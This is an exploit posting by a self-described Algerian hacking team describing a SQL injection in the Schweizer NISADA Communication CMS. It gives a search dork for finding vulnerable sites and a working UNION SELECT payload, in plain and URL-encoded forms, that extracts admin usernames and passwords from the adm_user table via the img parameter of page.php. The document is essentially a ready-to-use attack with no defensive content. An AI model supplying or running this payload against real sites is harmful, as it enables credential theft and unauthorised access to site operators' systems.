ALGERIAN HACKER **********************- NORTH-AFRICA SECURITY TEAM -*********************** [!] Schweizer NISADA Communication CMS SQL Injection Vulnerability [!] Author : Dr.0rYX and Cr3w-DZ [!] MAIL : vx3@hotmail.de & Cr3w@hotmail.de ***************************************************************************/ [ Software Information ] [+] Vendor : http://www.nisada.ch/ [+] script : Schweizer NISADA Communication CMS [+] Download : http://www.nisada.ch/contact.aspx (sell script ) [+] Vulnerability : SQL injection [+] Dork :inurl:"/CMS/page.php?p=" **************************************************************************/ [ Vulnerable File ] http://server/cms/page.php?p=1&img=[N.A.S.T ] [ Exploit ] http://server/cms/page.php?p=1&img=-1+UNION+ALL+select+1,2,3,4,5,GROUP_concat(CONVERT(num USING utf8),0x3a,CONVERT(user USINGutf8),0x3a,CONVERT(pswd USING utf8)),7,8,9,10,11,12,13,14+from+adm_user [ ExOMPLE ] http://server/cms/page.php?p=1&img=-207+UNION+ALL+select+1,2,3,4,5,GROUP_concat%28CONVERT%28num%20USING%20utf8%29,0x3a,CONVERT%28user%20USING%20utf8%29,0x3a,CONVERT%28pswd%20USING%20utf8%29%29,7,8,9,10,11,12,13,14+from+adm_user [ GReet ] [+] :claw ,xCv-DZ , HIS0K4 ,le0n ,www.arab-zone.org , exploit-db.com , ALL HACKERS MUSLIMS